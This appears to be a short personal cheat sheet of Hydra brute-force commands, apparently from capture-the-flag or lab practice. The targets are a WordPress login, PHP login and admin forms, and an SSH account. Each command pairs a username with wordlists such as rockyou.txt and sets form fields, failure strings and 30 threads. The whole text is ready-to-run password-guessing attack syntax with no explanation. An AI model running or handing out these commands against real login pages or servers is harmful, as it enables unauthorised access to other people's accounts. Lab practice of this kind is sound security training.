hydra -L fsocity.dic -p test <victim ip> http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:Invalid " -t 30

---------------------------------------------------------------------
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.48.182.33 http-post-form "/login.php:username=^USER^&password=^PASS^:H=Host\:lookup.thm:F=Wrong" -t 30 -vV    (whith domain name)

------------------------------------------------------------------------

hydra -l think -P /home/mystic/Downloads/test/htb/password.txt <victim ip> ssh

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.49.181.17 http-post-form "/admin/:user=admin&pass=^PASS^:Invalid"
